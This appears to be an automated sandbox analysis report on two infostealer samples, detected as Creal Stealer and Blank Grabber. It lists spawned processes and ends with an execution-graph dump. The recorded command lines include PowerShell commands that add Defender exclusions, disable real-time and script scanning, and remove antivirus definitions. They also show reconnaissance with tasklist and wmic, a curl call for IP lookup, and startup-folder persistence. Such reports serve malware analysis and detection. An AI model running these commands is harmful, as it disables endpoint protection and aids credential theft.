                                                                                                                                                                                                                                                      Imagebase:0x7ff606380000
                                                                                                                                                                                                                                                      File size:24'810'296 bytes
                                                                                                                                                                                                                                                      MD5 hash:3AC5F99224A92851C80FE4178FFF6002
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:11:02:14
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d9240000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:11:02:14
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Built.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff65e280000
                                                                                                                                                                                                                                                      File size:7'849'062 bytes
                                                                                                                                                                                                                                                      MD5 hash:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:11:02:15
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Built.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff65e280000
                                                                                                                                                                                                                                                      File size:7'849'062 bytes
                                                                                                                                                                                                                                                      MD5 hash:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                      Start time:11:02:17
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d9240000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                      Start time:11:02:18
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                      Imagebase:0x7ff7c4f90000
                                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                      Start time:11:02:19
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                      Imagebase:0x7ff75ae80000
                                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                      Start time:11:02:21
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl ifconfig.me
                                                                                                                                                                                                                                                      Imagebase:0x7ff7f84e0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                      Start time:11:02:23
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                      Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                      Start time:11:02:30
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                      Imagebase:0x7ff6eb860000
                                                                                                                                                                                                                                                      File size:468'120 bytes
                                                                                                                                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                      Start time:11:02:37
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff7da470000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                      Start time:11:02:39
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff7da470000
                                                                                                                                                                                                                                                      File size:16'912'015 bytes
                                                                                                                                                                                                                                                      MD5 hash:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6b7320000
                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                      Start time:11:02:41
                                                                                                                                                                                                                                                      Start date:10/11/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:curl ifconfig.me
                                                                                                                                                                                                                                                      Imagebase:0x7ff7f84e0000
                                                                                                                                                                                                                                                      File size:530'944 bytes
                                                                                                                                                                                                                                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:30.9%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:32
                                                                                                                                                                                                                                                        execution_graph 20560 7ff6063a653c 20583 7ff6063a5fc4 20560->20583 20563 7ff6063a6688 20701 7ff6063a6940 7 API calls 2 library calls 20563->20701 20564 7ff6063a6558 __scrt_acquire_startup_lock 20566 7ff6063a6692 20564->20566 20573 7ff6063a6576 __scrt_release_startup_lock 20564->20573 20702 7ff6063a6940 7 API calls 2 library calls 20566->20702 20568 7ff6063a659b 20569 7ff6063a669d abort 20570 7ff6063a6621 20591 7ff6063a6a8c 20570->20591 20572 7ff6063a6626 20594 7ff6063b0200 20572->20594 20573->20568 20573->20570 20698 7ff6063af530 35 API calls __GSHandlerCheck_EH 20573->20698 20703 7ff6063a6780 20583->20703 20586 7ff6063a5fef 20586->20563 20586->20564 20587 7ff6063a5ff3 20705 7ff6063b0130 20587->20705 20722 7ff6063a74c0 20591->20722 20724 7ff6063b3bc0 20594->20724 20596 7ff6063b020f 20598 7ff6063a662e 20596->20598 20728 7ff6063b3f50 35 API calls _snwprintf 20596->20728 20599 7ff6063a400c 20598->20599 20600 7ff6063a4046 20599->20600 20730 7ff606387a28 GetCurrentDirectoryW 20600->20730 20602 7ff6063a4052 20740 7ff60639d0a8 20602->20740 20604 7ff6063a405c memcpy_s 20745 7ff60639d724 20604->20745 20606 7ff6063a4226 GetCommandLineW 20610 7ff6063a43fa 20606->20610 20611 7ff6063a4238 20606->20611 20607 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20609 7ff6063a469a 20607->20609 20608 7ff6063a40d1 20608->20606 20667 7ff6063a4694 20608->20667 20848 7ff6063aae94 20609->20848 20796 7ff606387c10 20610->20796 20755 7ff6063812bc 20611->20755 20614 7ff6063a4409 20616 7ff606381b70 31 API calls 20614->20616 20620 7ff6063a4420 memcpy_s 20614->20620 20616->20620 20618 7ff6063a425d 20765 7ff6063a0620 20618->20765 20808 7ff606381b70 20620->20808 20621 7ff6063a444b SetEnvironmentVariableW GetLocalTime 20813 7ff6063861e8 20621->20813 20626 7ff6063a4267 20626->20609 20629 7ff6063a42b1 OpenFileMappingW 20626->20629 20630 7ff6063a4393 20626->20630 20633 7ff6063a42d1 MapViewOfFile 20629->20633 20634 7ff6063a4388 CloseHandle 20629->20634 20640 7ff6063812bc 33 API calls 20630->20640 20633->20634 20636 7ff6063a42f7 UnmapViewOfFile MapViewOfFile 20633->20636 20634->20610 20636->20634 20641 7ff6063a4329 20636->20641 20643 7ff6063a43b8 20640->20643 20853 7ff60639dd08 33 API calls 2 library calls 20641->20853 20642 7ff6063a452d 20841 7ff60639a430 20642->20841 20783 7ff6063a3810 20643->20783 20650 7ff6063a4339 20655 7ff6063a3810 35 API calls 20650->20655 20652 7ff60639a430 4 API calls 20656 7ff6063a453f DialogBoxParamW 20652->20656 20658 7ff6063a4348 20655->20658 20668 7ff6063a458b 20656->20668 20854 7ff60638bd30 131 API calls 20658->20854 20661 7ff6063a468f 20664 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20661->20664 20663 7ff6063a435d 20855 7ff60638be7c 131 API calls shared_ptr 20663->20855 20664->20667 20667->20607 20671 7ff6063a459e Sleep 20668->20671 20672 7ff6063a45a4 20668->20672 20670 7ff6063a4370 20674 7ff6063a437f UnmapViewOfFile 20670->20674 20671->20672 20675 7ff6063a45b2 shared_ptr 20672->20675 20856 7ff60639dac4 49 API calls 2 library calls 20672->20856 20674->20634 20680 7ff6063a45be DeleteObject 20675->20680 20682 7ff6063a45d7 DeleteObject 20680->20682 20683 7ff6063a45dd 20680->20683 20682->20683 20685 7ff6063a4613 20683->20685 20686 7ff6063a4625 20683->20686 20857 7ff6063a3928 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 20685->20857 20844 7ff60639d120 20686->20844 20690 7ff6063a4618 CloseHandle 20690->20686 20698->20570 20701->20566 20702->20569 20704 7ff6063a5fe6 __scrt_dllmain_crt_thread_attach 20703->20704 20704->20586 20704->20587 20706 7ff6063b41dc 20705->20706 20707 7ff6063a5ff8 20706->20707 20710 7ff6063b2110 20706->20710 